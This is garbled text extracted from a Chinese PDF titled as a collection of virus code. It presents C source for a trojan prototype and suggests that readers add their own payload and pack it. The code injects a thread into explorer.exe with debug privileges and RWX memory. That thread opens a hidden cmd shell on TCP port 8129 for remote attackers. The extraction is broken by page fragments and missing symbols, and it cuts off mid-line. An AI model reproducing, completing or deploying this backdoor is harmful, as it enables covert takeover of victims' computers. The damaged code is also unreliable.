病毒代码大全.pdf
1、制造木马 病毒代码大全2008-06-08 19:46 制造木马 病毒代 码大全 一个简单的木马原型基础代码添加上自己的XXX, 加上变态的壳,做点小修改,就可 以 #include #pragma comment(lib,“ws2_32.lib“) #include #include #pragma comment(lib,“Shlwapi.lib“) #include #include #include /参数结构; typedef struct _RemotePara DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAdd
2、ress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe
3、; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox12; char winsockDll16; char cmd10; char Buff4096; char telnetmsg60; RemotePara; / 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); / 根据进程名称得到进程ID DWORD GetPidByName(char *szName); / 远程线程执行 体 DWORD _stdcal
4、l ThreadProc(RemotePara *Para) WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWrit
5、ePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (_stdcall *PLoadLibrary)(char*); typedef FARPROC (_stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (_stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (_stdcall *PGetMod
6、uleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PClose
7、Handle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para-dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para-dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para-dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc
8、= (PGetModuleHandle)Para-dwGetModuleHandle; LoadLibraryFunc(Para-winsockDll); PWSAStartup = (FARPROC)Para-dwWSAStartup; PSocket = (FARPROC)Para-dwSocket; Phtons = (FARPROC)Para-dwhtons; Pbind = (FARPROC)Para-dwbind; Plisten = (FARPROC)Para-dwlisten; Paccept = (FARPROC)Para-dwaccept; Psend = (FARPROC
9、)Para-dwsend; Precv = (FARPROC)Para-dwrecv; Pclosesocket = (FARPROC)Para-dwclosesocket; PCreateProcessA = (FARPROC)Para-dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para-dwPeekNamedPipe; PWriteFile = (FARPROC)Para-dwWriteFile; PReadFile = (FARPROC)Para-dwReadFile; PCloseHandle = (FARPROC)Para-dwClose
10、Handle; PCreatePipe = (FARPROC)Para-dwCreatePipe; PTerminateProcess = (FARPROC)Para-dwTerminateProcess; PMessageBoxA = (FARPROC)Para-dwMessageBox; nVersion = MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA) listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket = INVALID_SOCKET)return 0; s
11、erver_addr.sin_family = AF_INET; server_addr.sin_port = Phtons(unsigned short)(8129); server_addr.sin_addr.s_addr = INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *) if(Plisten(listenSocket, 5)return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *) / Psend(clientSocket, Para-telnetms
12、g, 60, 0); if(!PCreatePipe( if(!PCreatePipe( ZeroMemory( /ZeroMemory 是 C 运行库 函数,可以直接调用si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; if(!PCreateProcessA(NULL,Para-cmd,NULL,NULL,1,0,NUL L,NULL, w
13、hile(1) memset(Para-Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para-Buff,4096, if(lBytesRead) if(!PReadFile(hReadPipe1, Para-Buff, lBytesRead, if(!Psend(clientSocket, Para-Buff, lBytesRead, 0)break; else lBytesRead=Precv(clientSocket, Para-Buff, 4096, 0); if(lBytesRead Buff, lBytesRead, PCloseHandle(hW
14、ritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); / PMessageBoxA(NULL, Para-strMessageBox, Para-strMessageBox, MB_OK); return 0; int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR l
15、pCmdLine, int nCmdShow) const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES, EnablePrivilege(hToken,
16、SE_DEBUG_NAME,TRUE); / 获得 指定进程句柄, 并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName(“EXPLORER.EXE“); if(pID = 0)return 0; hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0; / 在远程进程地址空间分配 虚拟内存pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | ME
17、M_RESERVE,PAGE_EXECUTE_READWRITE); if(!pRemoteThread)return 0; / 将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, ZeroMemory( hKernel = LoadLibrary( “kernel32.dll“); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, “LoadLibraryA“); myRemotePara.dwFreeLibrary =
18、(DWORD)GetProcAddress(hKernel, “FreeLibrary“); myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, “GetProcAddress“); myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, “GetModuleHandleA“); myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, “CreateProcessA“); myRe
19、motePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, “PeekNamedPipe“); myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, “WriteFile“); myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, “ReadFile“); myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, “CloseHandle“); myRemo
20、tePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, “CreatePipe“); myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, “TerminateProcess“); hSock = LoadLibrary(“wsock32.dll“); myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,“WSAStartup“); myRemotePara.dwSocket = (DWORD)GetProcA